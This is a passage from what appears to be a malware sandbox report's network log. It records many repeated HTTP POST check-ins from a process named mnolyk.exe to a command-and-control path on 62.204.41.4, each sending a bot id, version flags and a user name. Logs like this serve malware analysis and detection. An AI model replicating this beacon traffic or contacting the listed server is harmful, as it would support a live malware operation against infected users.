                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:19.551383018 CET679INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          525192.168.2.65025062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:19.754499912 CET680OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:19.820547104 CET680INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          526192.168.2.65025162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:20.007203102 CET681OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:20.073108912 CET681INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          527192.168.2.65025262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:20.248979092 CET682OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:20.311841965 CET682INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          528192.168.2.65025362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:20.519824982 CET683OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:20.583318949 CET683INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          529192.168.2.65025462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:20.750307083 CET684OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:20.814074993 CET684INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:20 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          53192.168.2.64977262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:03.779261112 CET166OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:03.843966007 CET166INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          530192.168.2.65025562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:20.983532906 CET685OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:21.049305916 CET685INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          531192.168.2.65025662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:21.219152927 CET686OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:21.283005953 CET686INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          532192.168.2.65025762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:21.461330891 CET687OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:21.526721954 CET687INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          533192.168.2.65025862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:21.947679043 CET688OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:22.011472940 CET688INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:21 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          534192.168.2.65025962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:22.267663002 CET689OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:22.332771063 CET689INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          535192.168.2.65026062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:22.605984926 CET690OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:22.670617104 CET690INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:22 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          536192.168.2.65026162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:23.514341116 CET691OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:23.579701900 CET691INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          537192.168.2.65026262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:23.849061012 CET692OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:23.912177086 CET692INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:23 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          538192.168.2.65026362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:25.380079985 CET693OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:25.446877956 CET693INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          539192.168.2.65026462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:25.691638947 CET694OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:25.756413937 CET694INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          54192.168.2.64977362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:04.038337946 CET167OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:04.103609085 CET167INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          540192.168.2.65026562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:25.941004038 CET695OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:26.004627943 CET695INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:25 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          541192.168.2.65026662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:26.196924925 CET696OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:26.263787031 CET696INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          542192.168.2.65026762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:26.438066959 CET697OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:26.500848055 CET697INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:26 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          543192.168.2.65026862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:26.680608034 CET698OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
